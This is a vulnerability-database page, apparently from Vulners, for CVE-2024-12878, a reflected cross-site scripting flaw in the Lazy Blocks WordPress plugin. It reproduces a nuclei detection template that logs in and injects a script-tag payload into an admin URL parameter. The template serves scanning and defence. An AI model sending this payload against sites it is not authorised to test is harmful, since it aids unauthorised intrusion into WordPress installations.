Lucene search
K

Lazy Blocks <= 3.8.2 - Cross-Site Scripting

🗓️ 11 Feb 2026 18:48:12Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 8 Views

Lazy Blocks plugin below 3.8.3 has reflected cross-site scripting due to lack of sanitization.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2024-12878
26 Feb 202506:25
circl
CNNVD
WordPress plugin Custom Block Builder 安全漏洞
26 Feb 202500:00
cnnvd
CVE
CVE-2024-12878
26 Feb 202506:00
cve
Cvelist
CVE-2024-12878 Custom Block Builder – Lazy Blocks < 3.8.3 - Reflected XSS
26 Feb 202506:00
cvelist
EUVD
EUVD-2025-5312
3 Oct 202520:07
euvd
NVD
CVE-2024-12878
26 Feb 202513:15
nvd
OSV
CVE-2024-12878
26 Feb 202513:15
osv
Patchstack
WordPress Lazy Blocks plugin <= 3.8.2 - Reflected Cross-Site Scripting vulnerability
12 Feb 202522:21
patchstack
Positive Technologies
PT-2025-8672
26 Feb 202500:00
ptsecurity
RedhatCVE
CVE-2024-12878
28 Feb 202506:28
redhatcve
Rows per page
id: CVE-2024-12878

info:
  name: Lazy Blocks <= 3.8.2 - Cross-Site Scripting
  author: Shivam Kamboj
  severity: medium
  description: |
    Custom Block Builder WordPress plugin < 3.8.3 contains a reflected cross-site scripting caused by lack of sanitization and escaping of a parameter before output, letting attackers execute malicious scripts in high privilege users' browsers, exploit requires victim to load malicious page.
  impact: |
    Attackers can execute malicious scripts in high privilege users' browsers, potentially leading to session hijacking or account compromise.
  remediation: |
    Update to version 3.8.3 or later.
  reference:
    - https://wpscan.com/vulnerability/827444d1-87cb-4057-827a-d802eac82cf8/
    - https://nvd.nist.gov/vuln/detail/CVE-2024-12878
  metadata:
    verified: true
    max-request: 2
  tags: cve,cve2024,wordpress,wp,wp-plugin,lazy-blocks,xss,reflected,authenticated

flow: http(1) && http(2)

http:
  - raw:
      - |
        POST /wp-login.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        log={{username}}&pwd={{password}}&wp-submit=Log+In

    matchers:
      - type: dsl
        dsl:
          - 'contains(header, "wordpress_logged_in")'
          - 'status_code == 302'
        condition: and
        internal: true

  - raw:
      - |
        GET /wp-admin/edit.php?post_type=lazyblocks&"></script><script>alert(1331)</script>=1" HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "</script><script>alert(1331)</script>", "edit-lazyblocks", "lazyblocks")'
          - 'contains(content_type, "text/html")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022100d35978956ec3d62cfac747bf24f53aa063cae11a90f857b4c8bbf7e51f8d2db10220145932abaa8704bc120d90a1d8792612f04388636564ecf99a274daba50df1cb:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

11 Feb 2026 12:41Current
5.2Medium risk
Vulners AI Score5.2
CVSS 3.17.1
EPSS0.00593
SSVC
8